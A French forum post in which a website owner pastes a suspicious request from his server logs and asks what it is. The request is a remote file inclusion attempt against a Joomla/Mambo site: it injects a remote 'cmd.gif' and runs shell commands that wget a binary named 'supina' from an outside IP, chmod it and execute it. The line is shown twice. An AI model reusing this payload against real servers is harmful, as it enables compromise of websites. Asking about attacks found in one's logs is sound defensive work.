En regardant les stats d'un de mes sites, j'ai vu plusieurs accès direct via ce code :
CODE
http://xxx.xxx.xxx.xxx/index.php?
option=com_content&do_pdf=1&id=1index2.php?
_REQUEST[option]=com_content&_REQUEST[Itemid]=
1&GLOBALS=&mosConfig_absolute_path=
http://219.84.105.36/cmd.gif?&cmd=cd%20/tmp;
wget%20219.84.105.36/supina;chmod%20744%20supina;./sup
NB : j'ai scindé la requête pour qu'elle puisse rentrée dans le post, mais il s'agit bien d'une seule et unique ligne...option=com_content&do_pdf=1&id=1index2.php?
_REQUEST[option]=com_content&_REQUEST[Itemid]=
1&GLOBALS=&mosConfig_absolute_path=
http://219.84.105.36/cmd.gif?&cmd=cd%20/tmp;
wget%20219.84.105.36/supina;chmod%20744%20supina;./sup
L'adresse IP du site en question a été remplacé par des xxx : il s'agit du site de mon entreprise.
La seconde IP m'est inconnu...
Quand on colle cette ligne dans la barre d'adresse du navigateur, on tombe directement sur le site de mon entreprise...
Quelqu'un peut-il m'expliquer à quoi corresponds cette entrée bizarre (code après le index.php) ?
Merci
